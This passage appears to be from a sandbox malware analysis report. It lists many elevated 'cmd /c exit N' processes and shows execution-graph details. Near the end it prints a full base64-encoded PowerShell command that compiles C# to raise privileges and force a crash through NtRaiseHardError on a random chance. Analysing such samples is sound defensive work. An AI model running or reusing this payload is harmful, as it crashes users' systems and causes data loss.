                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:26
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 119
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:27
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 120
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:28
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 121
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:29
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 122
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:30
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 65
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:31
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 66
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:32
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 67
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:33
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 68
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:34
                      Start time:08:51:33
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 69
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:35
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 70
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:36
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 71
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:37
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 72
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:38
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 73
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:39
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 74
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:40
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 75
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:41
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 76
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:42
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 77
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:43
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 78
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:44
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 79
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:45
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 80
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:46
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 81
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:47
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 82
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:48
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 83
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:49
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 84
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:50
                      Start time:08:51:34
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 85
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:51
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 86
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:52
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 87
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:53
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 88
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:54
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 89
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:55
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 90
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:56
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 48
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:57
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 49
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:58
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 50
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:59
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 51
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:60
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 52
                      Imagebase:0x7ff7403e0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:61
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 53
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:62
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 54
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:63
                      Start time:08:51:35
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 55
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:64
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 56
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:65
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 57
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:66
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 123
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:67
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 125
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:68
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 63
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:69
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 58
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:70
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 46
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:71
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 61
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:72
                      Start time:08:51:36
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 44
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:73
                      Start time:08:51:37
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 95
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:74
                      Start time:08:51:37
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 45
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:75
                      Start time:08:51:38
                      Start date:05/10/2024
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGEAbgBnAHUAYQBnAGUAIABDAFMAaABhAHIAcAAgAC0AUABhAHMAcwBUAGgAcgB1ACAALQBDAG8AbQBwAGkAbABlAHIAUABhAHIAYQBtAGUAdABlAHIAcwAgACQAYwA7AGkAZgAoACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBpAG4AIAAxACAALQBNAGEAeAAgADcAKQAgAC0AZQBxACAAMQApAHsAWwBYAF0AOgA6AFMAaABvAHQAKAApAH0AUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIA
                      Imagebase:0x7ff6e3d50000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:false

                      General

                      Target ID:76
                      Start time:08:51:39
                      Start date:05/10/2024
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"
                      Imagebase:0x7ff694fb0000
                      File size:2'759'232 bytes
                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:77
                      Start time:08:51:39
                      Start date:05/10/2024
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP"
                      Imagebase:0x7ff715010000
                      File size:52'744 bytes
                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:4%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:50%
                        Total number of Nodes:6
                        Total number of Limit Nodes:0
                        execution_graph 1432 7ffd34575b94 1433 7ffd34575b9d NtRaiseHardError 1432->1433 1435 7ffd34575c7d 1433->1435 1436 7ffd34575a42 1437 7ffd34575ae3 RtlAdjustPrivilege 1436->1437 1439 7ffd34575b5c 1437->1439

                        Executed Functions

                        Function 00007FFD34575B94 Relevance: 1.6, APIs: 1, Instructions: 130nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2273018567.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_7ffd34570000_powershell.jbxd
                        Similarity
                        • API ID: ErrorHardRaise
                        • String ID:
                        • API String ID: 435474256-0
                        • Opcode ID: 3a66caa4baf822c01b898d50a4ab67a22592a02f0bcff3038cdb9ca78cb6b66a
                        • Instruction ID: 602430019ebad4a983c9290cc1549ddb0b064bd285fd1a28e438aaf82464ba55
